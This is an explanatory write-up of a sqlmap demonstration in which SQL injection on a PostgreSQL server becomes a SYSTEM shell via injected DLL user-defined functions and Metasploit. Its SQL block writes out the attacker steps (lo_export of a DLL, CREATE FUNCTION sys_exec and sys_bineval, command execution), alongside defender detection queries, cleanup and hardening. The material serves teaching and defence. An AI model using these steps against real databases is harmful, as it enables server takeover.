Testing SQL Injections with Sqlmap

sqlmap is an open source penetration testing tool that automates detecting and exploiting SQL injection flaws and taking over the underlying database server. This video demonstrates sqlmap's out-of-band takeover features together with its Metasploit integration.

sqlmap is launched against an ASP.NET test page hosted on a Microsoft Windows Server 2003 machine whose back-end database management system is PostgreSQL 8.4. The tool is instructed to identify possible SQL injections and exploit them by spawning an out-of-band Meterpreter session between the user's machine and the database server, then escalating the database process's privileges to SYSTEM. sqlmap first uploads a dynamic-link library (DLL) and uses it to create two user-defined functions, sys_exec() and sys_bineval(), in the database. It then prompts the user for the options needed to generate the Metasploit shellcode and executes that shellcode in memory, inside the database process, through the injected sys_bineval() user-defined function. Once the out-of-band Meterpreter session is established, control passes to the Metasploit command line interface, where the user has a SYSTEM shell on the database server. Note that creating C-language functions in PostgreSQL requires superuser rights, so this takeover only succeeds when the web application connects to the database with a superuser account; that is the single configuration choice that turns an injection into a server compromise.
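The following SQL is an added illustration, not sqlmap's own source code or the commands shown in the video, of the PostgreSQL mechanism the paragraph describes: a library already written to disk is registered as C-language user-defined functions, and the same catalog that records those functions is where a defender looks for them afterwards. The library path, the large-object id and the function names are assumptions for the example; sqlmap's real library names and staging paths differ.

```sql
-- Attacker side (runs as the injected, superuser database account).
-- Step 1: the uploaded library has been staged as a large object and is
-- exported to a path the PostgreSQL service can load from.
-- (loid 16400 and the path are assumed values for this example.)
SELECT lo_export(16400, 'C:\Windows\Temp\libudf_example.dll');

-- Step 2: register exported symbols as user-defined functions.
-- CREATE FUNCTION ... LANGUAGE C only works for a superuser, which is the
-- privilege condition that makes this takeover possible at all.
CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4
    AS 'C:\Windows\Temp\libudf_example.dll', 'sys_exec'
    LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;

CREATE OR REPLACE FUNCTION sys_bineval(text) RETURNS int4
    AS 'C:\Windows\Temp\libudf_example.dll', 'sys_bineval'
    LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;

-- Step 3: execute a command, or run shellcode in the database process.
-- (sys_bineval takes the encoded shellcode as its argument; the payload
-- itself is generated by Metasploit and is not shown here.)
SELECT sys_exec('whoami');

-- Defender side: list every C-language function whose library is not
-- under $libdir. Legitimate extensions live under $libdir; anything else
-- is a strong indicator of UDF injection.
SELECT p.proname, p.probin, r.rolname AS owner
  FROM pg_proc p
  JOIN pg_language l ON l.oid = p.prolang
  JOIN pg_roles    r ON r.oid = p.proowner
 WHERE l.lanname = 'c'
   AND (p.probin IS NULL OR p.probin NOT LIKE '$libdir%');

-- Leftover large objects from the upload stage are another artefact.
SELECT DISTINCT loid FROM pg_largeobject;

-- Cleanup after the engagement (or after the incident).
DROP FUNCTION IF EXISTS sys_exec(text);
DROP FUNCTION IF EXISTS sys_bineval(text);
SELECT lo_unlink(16400);

-- Hardening: the application account must not be a superuser.
-- (app_user is an assumed role name.)
ALTER ROLE app_user NOSUPERUSER;
```

The defender queries work on PostgreSQL 8.4 and later; on versions that support `pg_largeobject_metadata` (9.0+) the large-object check can also report the owning role.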
